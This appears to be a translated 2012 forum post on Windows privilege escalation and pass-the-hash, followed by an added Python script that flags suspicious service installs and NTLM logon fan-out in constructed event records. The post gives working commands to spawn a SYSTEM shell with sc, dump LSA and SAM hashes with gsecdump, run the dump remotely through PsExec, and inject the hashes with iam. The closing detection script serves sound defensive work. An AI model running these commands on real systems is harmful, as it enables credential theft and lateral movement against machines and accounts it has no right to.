Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, or with gethash, actually don't need cracking at all; it is just a matter of using the tools. As the original article puts it well: no matter whether the password is 4 characters or 127, once you have the hash, it's 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
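The post shows two things a defender can look for: a service created to spawn cmd.exe as SYSTEM, and an account's hashes being reused against other machines over NTLM (the PsExec/gsecdump run, and the hash injection the tip describes). The triage script below is an added example, not code from the post or from Truesec. It works on constructed, simplified event records in dict form; the field names follow the Windows System log event 7045 (a service was installed) and the Security log event 4624 (successful logon), and the fan-out threshold and image-path patterns are assumptions chosen for the sample.

```python
"""Triage of service-install and NTLM logon records for the two techniques in the post.

Added example. Records are constructed dicts, not real telemetry; field names
mirror Windows event 7045 (System log) and event 4624 (Security log).
"""
from collections import defaultdict
import re

# Service binaries that should not appear as a freshly installed service:
# an interactive shell, or PsExec's service stub (PSEXESVC).
SUSPICIOUS_IMAGE = re.compile(r"(cmd\.exe|powershell\.exe|psexesvc)", re.IGNORECASE)

# Assumed threshold: one account authenticating over NTLM (network logon,
# type 3) to this many distinct hosts is treated as lateral movement.
HOST_FANOUT_THRESHOLD = 3


def check_service_install(event):
    """Flag a 7045 record whose ImagePath is a shell or the PsExec service stub."""
    if event.get("EventID") != 7045:
        return None
    image = event.get("ImagePath", "")
    if SUSPICIOUS_IMAGE.search(image):
        return {
            "rule": "suspicious_service_install",
            "host": event["Computer"],
            "service": event.get("ServiceName"),
            "image": image,
        }
    return None


def check_ntlm_fanout(events):
    """Group 4624 NTLM network logons by account and count the distinct target hosts."""
    targets = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4624:
            continue
        if ev.get("LogonType") != 3 or ev.get("AuthenticationPackageName") != "NTLM":
            continue  # Kerberos and interactive logons are not what we are after here
        targets[ev["TargetUserName"].lower()].add(ev["Computer"])
    return [
        {"rule": "ntlm_lateral_fanout", "account": acct, "hosts": sorted(hosts)}
        for acct, hosts in sorted(targets.items())
        if len(hosts) >= HOST_FANOUT_THRESHOLD
    ]


def triage(events):
    """Run both checks and return the list of alerts, service installs first."""
    alerts = [a for a in (check_service_install(e) for e in events) if a]
    alerts.extend(check_ntlm_fanout(events))
    return alerts


# Constructed sample records (not real logs). WS01 mirrors the sc create in the
# post, WS02 mirrors a PsExec run, WS03 is a benign service for contrast, and
# the 4624 records show one account reaching three hosts over NTLM.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "shellcmdline",
     "ImagePath": r"C:\WINDOWS\system32\cmd.exe /K start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "WS02", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "WS03", "ServiceName": "Spooler",
     "ImagePath": r"C:\WINDOWS\system32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 4624, "Computer": "WS02", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "admin", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Computer": "WS03", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "Admin", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Computer": "WS04", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "admin", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Computer": "WS05", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "alice", "IpAddress": "10.0.0.9"},
    {"EventID": 4624, "Computer": "WS01", "LogonType": 2,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "bob", "IpAddress": "-"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The fan-out check is deliberately coarse: a single NTLM network logon is normal, so the signal is one account touching many hosts in a short window, which is what both the psexec loop in the post and a hash-injection session produce. Account names are lower-cased before grouping because the same account shows up with varying case across hosts.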